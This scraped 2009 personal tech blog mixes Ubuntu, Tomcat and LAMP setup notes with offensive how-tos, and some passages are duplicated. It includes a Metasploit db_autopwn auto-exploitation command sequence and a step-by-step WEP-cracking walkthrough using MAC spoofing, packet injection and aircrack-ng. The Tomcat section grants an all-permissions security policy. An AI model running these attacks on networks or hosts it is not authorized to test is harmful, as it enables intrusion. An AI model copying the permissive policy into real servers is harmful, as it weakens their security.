http://www.ethicalhacker.net/content/view/249/1/
Friday, June 12, 2009
Metasploit db_autopwn
./msfconsole
db_create test
db_hosts
db_nmap IP ADDRESS TO TEST -p PORT
db_hosts
db_autopwn -t -p -e -s -b
sessions -l
sessions -i
db_create test
db_hosts
db_nmap IP ADDRESS TO TEST -p PORT
db_hosts
db_autopwn -t -p -e -s -b
sessions -l
sessions -i
Monday, June 8, 2009
Restore VISTA MBR (if the traditional methods are failing)
- Download and install EasyBCD
- Click on the Manage Bootloader button
- Make sure "Reinstall the Vista Bootloader" is selected
- Hit the "Write MBR" button
- Re-start your machine
Your Vista Bootloader should be restored.
Saturday, June 6, 2009
Synaptic not showing all packages
On a fresh VMware install of Ubuntu 8.10 I ran into the problem where additional packages weren't showing up in the Synaptic Package Manager. I've seen this before and have previously been able to resolve it. Once and for all I'm going to blog the fix so I can find it for future reference.
- Open up a terminal
- Enter the command: sudo update-apt-xapian-index
- Restart Synaptic Package Manager when the update is complete
- You may need to reload the package information by clicking Ctrl-R
- It should work fine now
Setup a Tomcat server in Ubuntu
Install the required packages (either using "apt-get install" in the terminal or from the package manager), then follow the instructions to configure it:
Open /etc/default/tomcat5.5 in a text editor.
Change the line that starts:
#JAVA_HOME.
to read:
JAVA_HOME=/usr/lib/jvm/java-6-sun
** This assumes that you have java 6 installed. Check that you have that folder.
Update the tomcat security policy:
sudo gedit /etc/tomcat5.5/policy.d/03catalina.policy
At the very end of the file, add the lines:
grant {
permission java.net.AllPermission;
permission java.net.SocketPermission "localhost:3306", "connect";
};
Next you need to import a .jar into your Tomcat. To do so go to http://dev.mysql.com/downloads/connector/j/5.1.html and download the tar file. When it asks if you have registered look below and where it says 'No Thanks'. Double click on the downloaded tar file and extract. Go into the newly created folder and run:
sudo cp mysql-connector-java-5.1.5-bin.jar /usr/share/tomcat5.5/server/lib/
This will copy that jar file into the library for jsp.
Restart your tomcat server:
sudo /etc/init.d/tomcat5.5 restart
- tomcat5.5
- tomcat5.5-admin
- tomcat5.5-webapps
- sun-java6-jdk
Open /etc/default/tomcat5.5 in a text editor.
Change the line that starts:
#JAVA_HOME.
to read:
JAVA_HOME=/usr/lib/jvm/java-6-sun
** This assumes that you have java 6 installed. Check that you have that folder.
Update the tomcat security policy:
sudo gedit /etc/tomcat5.5/policy.d/03catalina.policy
At the very end of the file, add the lines:
grant {
permission java.net.AllPermission;
permission java.net.SocketPermission "localhost:3306", "connect";
};
Next you need to import a .jar into your Tomcat. To do so go to http://dev.mysql.com/downloads/connector/j/5.1.html and download the tar file. When it asks if you have registered look below and where it says 'No Thanks'. Double click on the downloaded tar file and extract. Go into the newly created folder and run:
sudo cp mysql-connector-java-5.1.5-bin.jar /usr/share/tomcat5.5/server/lib/
This will copy that jar file into the library for jsp.
Restart your tomcat server:
sudo /etc/init.d/tomcat5.5 restart
Setup LAMP in Ubuntu
1. Install Apache2
Search for and install these packages from the package manager:
To set up under Apache all you need to do is include the following line in /etc/apache2/apache2.conf, first type the following command to open up this file:
Open up a browser and type "http://127.0.1.1/" into the address bar. If a page comes up that says "It works!" your Apache server is running and configured. Now point to "http://127.0.1.1/phpmyadmin" and verify that the phpmyadmin page comes up.
- Start the package manager by going to the menu: "System>Administration>Synaptic Package Manager"
- Enter your password to allow the program to run.
- Search for the package named "apache2" by clicking the search button on the menu bar.
- Find the package named exactly "apache2"
- Click the check box next to the package and choose "Mark for installation" from the pop up menu.
- A window will appear asking if additional changes should be made. These are other packages that apache2 requires to function properly. Choose the button that says "Mark".
- Apply the changes by clicking the "Apply" button from the menu
- Note: You can select as many packages as you want before applying changes. For example you could install Apache2 at the same time as you install MySQL.
Search for and install these packages from the package manager:
- php5-mysql
- mysql-server
- mysql-client
- phpmyadmin (installer will ask what server to connect to. Choose apache2.)
- libapache2-mod-auth-mysql
To set up under Apache all you need to do is include the following line in /etc/apache2/apache2.conf, first type the following command to open up this file:
sudo gedit /etc/apache2/apache2.conf
Add the following line of code inside apache2.conf:
Include /etc/phpmyadmin/apache.conf
Now restart Apache:sudo /etc/init.d/apache2 restart
Open up a browser and type "http://127.0.1.1/" into the address bar. If a page comes up that says "It works!" your Apache server is running and configured. Now point to "http://127.0.1.1/phpmyadmin" and verify that the phpmyadmin page comes up.
Tuesday, June 2, 2009
Cracking WEP
I've looked at several different methods for cracking WEP... this is what worked for me:
Because my onboard wireless NIC does not support packet injection I used my wireless USB adapter to do this in BackTrack 4.
Setup your adapter:
Code:
Start up Kismet from the command line and start collecting information (look for the WEP network you want to crack and record the channel, BSSID, and ESSID):
Code:
Open a new terminal session. Plug the values you collected from kismet into the command below (you may want to create and browse to a temporary directory because this will create several files that will dumped into the present working directory):
Code:
Next you'll want to create another terminal session and begin authentication with the router:
Code:
At this point open another terminal and begin packet injection (this should bump up your packet collection significantly):
Code:
The final step to the crack is simple. Point aircrack-ng to the .ivs file that airodump-ng created. It will process until there are enough packets collected and then give you the WEP key.
Code:
This should do it... I'll tweak this as go to make it better. Feel free to give feedback if you have suggestions or changes.
Because my onboard wireless NIC does not support packet injection I used my wireless USB adapter to do this in BackTrack 4.
Setup your adapter:
Code:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
Start up Kismet from the command line and start collecting information (look for the WEP network you want to crack and record the channel, BSSID, and ESSID):
Code:
kismet
Open a new terminal session. Plug the values you collected from kismet into the command below (you may want to create and browse to a temporary directory because this will create several files that will dumped into the present working directory):
Code:
airodump-ng -c (channel) -w (filename) --bssid (BSSID) wlan0 --ivs
Next you'll want to create another terminal session and begin authentication with the router:
Code:
aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 wlan0
At this point open another terminal and begin packet injection (this should bump up your packet collection significantly):
Code:
aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 wlan0
The final step to the crack is simple. Point aircrack-ng to the .ivs file that airodump-ng created. It will process until there are enough packets collected and then give you the WEP key.
Code:
aircrack-ng -s /wep_router.ivs
This should do it... I'll tweak this as go to make it better. Feel free to give feedback if you have suggestions or changes.
Monday, June 1, 2009
BT4 and rausb0 (the driver I used in BT3)
After much trial, I finally figured out how to configure my USB wireless adapter that utilized the rausb0 driver in BackTrack 3. Since moving over to BackTrack 4 I haven't been able to use my external USB adapter.
Below is the command I was using with the resulting error:
Below is the command I was using with the resulting error:
root@bt:~# ifconfig rausb0 up
rausb0: ERROR while getting interface flags: No such device
I finally figured out that they have updated the driver for my Hawking device to use the wlan0 driver instead. I'm not sure how this works for other devices but it fixed my problem. New command:rausb0: ERROR while getting interface flags: No such device
root@bt:~# ifconfig wlan0 up
root@bt:~#
Success!
root@bt:~#
Success!
Subscribe to:
Posts (Atom)
